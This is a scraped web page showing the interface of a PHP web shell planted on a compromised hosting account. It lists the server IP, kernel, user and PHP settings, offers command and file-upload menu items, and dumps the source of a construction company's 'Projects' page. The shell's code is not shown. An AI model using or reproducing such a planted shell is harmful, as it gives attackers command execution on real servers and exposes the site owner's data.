Server IP : 103.53.40.154 / Your IP : 3.135.190.107 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/ltbuildcon.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include_once('admin/config.php'); ?> <!DOCTYPE html> <html lang="en"> <head> <title> Projects - L T Buildcon</title> <?php include 'top-link.php';?> </head> <body> <div id="page_wrapper"> <?php include 'header.php';?> <!--============== Page Banner Start ==============--> <div style="background-image: url(https://img.freepik.com/free-photo/modern-architecture-shapes-futuristic-cityscape-reflecting-travel-innovation-generative-ai_188544-15491.jpg?w=1060&t=st=1689238114~exp=1689238714~hmac=c57ef68…);background-size: cover;" class="page-banner-simple bg-secondary py-40"> <div class="container"> <div class="row"> <div class="col-lg-6"> </div> </div> </div> </div> <!--============== Page Banner End ==============--> <!--============== Page title Start ==============--> <div class="full-row py-5"> <div class="container"> <div class="row"> <div class="col"> <h1 class="text-secondary">Projects</h1> <nav aria-label="breadcrumb"> <ol class="breadcrumb mb-0 bg-transparent p-0"> <li class="breadcrumb-item"><a href="<?php echo $wspath?>">Home</a> </li> <li class=" active text-primary" aria-current="page"> - Projects</li> </ol> </nav> </div> </div> </div> </div> <!--============== Page title End ==============--> <?php include 'index-property-cat.php';?> <?php include 'footer.php';?> </div> </body> </html>